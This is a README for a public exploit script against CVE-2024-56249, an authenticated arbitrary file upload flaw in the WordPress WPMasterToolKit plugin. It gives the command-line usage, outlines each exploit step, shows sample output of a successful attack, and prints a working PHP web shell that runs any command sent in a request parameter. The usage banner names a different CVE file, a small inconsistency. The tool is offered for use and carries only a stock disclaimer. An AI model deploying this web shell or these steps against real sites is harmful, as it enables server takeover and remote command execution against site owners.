# 🛠️ WordPress Master Toolkit Exploit (CVE-2024-56249)

## 🌟 Overview
This script exploits an Arbitrary File Upload vulnerability in the WordPress WPMasterToolKit plugin, allowing an attacker to upload a web shell to the server. The vulnerability exists in versions <= 1.13.1 of the plugin.

## 📝 CVE Details
- **CVE ID**: CVE-2024-56249
- **Published**: 2025-01-02
- **Updated**: 2025-01-02
- **Description**: Unrestricted Upload of File with Dangerous Type vulnerability in Webdeclic WPMasterToolKit allows uploading a Web Shell to a Web Server.
- **CWE**: CWE-434: Unrestricted Upload of File with Dangerous Type
- **CVSS Score**: 9.1 (Critical)
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

## 🚀 Usage
To exploit this vulnerability, use the following command:

```sh
python CVE-2024-56249.py -u <URL> -un <USERNAME> -p <PASSWORD> -fn <FILENAME>
```

### 📋 Parameters
- `-u` / `--url`: Target WordPress URL (e.g., `http://192.168.100.74:888/wordpress`)
- `-un` / `--username`: WordPress admin username
- `-p` / `--password`: WordPress admin password
- `-fp` / `--filepath`: File upload path (default: `wp-content/uploads/2025/03`)
- `-fn` / `--filename`: File name to upload (default: `shell.php`)

### 🧩 Script Explanation

#### 🔍 1. Probe Vulnerability
The script starts by probing the target URL to verify if it is vulnerable to CVE-2024-56249 by checking the version of the WPMasterToolKit plugin.

#### 🔑 2. Authenticate to WordPress
It then attempts to log in to the WordPress admin panel using the provided credentials.

#### 🛡️ 3. Extract Security Tokens
After successful login, the script extracts the necessary security tokens (nonce and token) required for file upload.

#### 📤 4. Deploy Payload
It uploads the specified file (e.g., a web shell) to the target server using the extracted tokens.

#### ✅ 5. Verify Upload
Finally, the script verifies if the file has been uploaded successfully by checking its accessibility via the target URL.

### 📂 Note
Ensure that the shell file (e.g., `shell.php`) is placed in the same directory as the script before running it. This is necessary for the script to successfully locate and upload the file.

#### Example Shell File (`shell.php`)
```php
<?php
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
}
?>
```

## 💡 Example
```sh
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
```

## 🖥️ Output
```sh
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
[🔍] Detected plugin version: 1.13.1
[🔥] Target is VULNERABLE to CVE-2024-56249! Exploiting...
[🔑] Attempting to log in...
[✅] Authentication successful!
[📡] Extracting security tokens...
[✅] Extracted nonce: e4ae47c8d8
[✅] Extracted token: e4ae47c8d8
[📤] Attempting to upload shell.php to wp-content/uploads/2025/03...
[✅] Upload request sent successfully.
[🔥] Shell successfully uploaded! Access it here: http://target/wp-content/uploads/2025/03/shell.php
```

## 🛠️ Script Usage
```sh
usage: CVE-2025-1307.py [-h] -u URL -un USERNAME -p PASSWORD [-fp FILEPATH] [-fn FILENAME]

Master Toolkit Exploit CVE-2024-56249 #by Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://192.168.100.74:888/wordpress4/)
  -un, --username USERNAME
                        WordPress admin username
  -p, --password PASSWORD
                        WordPress admin password
  -fp, --filepath FILEPATH
                        File upload path (default: wp-content/uploads/2025/03)
  -fn, --filename FILENAME
                        File name to upload (default: shell.php)
```

## ⚠️ Disclaimer
This tool is intended for educational purposes only. Use it at your own risk. The author is not responsible for any misuse or damage caused by this tool.

---

*Exploit script by Nxploit | Khaled Alenazi*
